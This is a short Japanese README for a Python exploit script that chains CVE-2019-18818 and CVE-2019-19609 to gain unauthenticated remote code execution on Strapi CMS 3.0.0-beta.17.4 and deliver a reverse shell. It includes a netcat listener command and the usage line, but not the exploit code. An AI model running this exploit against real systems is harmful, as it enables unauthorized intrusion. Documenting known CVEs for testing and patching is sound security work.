
CVE-2019-18818およびCVE-2019-19609を介してStrapi CMS 3.0.0-beta.17.4の未認証リモートコード実行を標的とするPythonエクスプロイトスクリプト。リバースシェルを配信します。
このエクスプロイトは、Strapi CMS フレームワーク バージョン 3.0.0-beta-17.4 の 2 つの脆弱性を対象とし、認証なしのリモートコード実行(RCE)を可能にします。
忘れたパスワードに対する脆弱なパスワード回復メカニズム
CVSS: 9.8 - 緊急
詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
OS コマンドで使用される特殊要素の不適切な無害化('OS コマンドインジェクション')
CVSS: 7.2 - 高
詳細: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
このエクスプロイトを実行する前に、以下のオプションで指定する lport で netcat リスナーを起動してください。
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>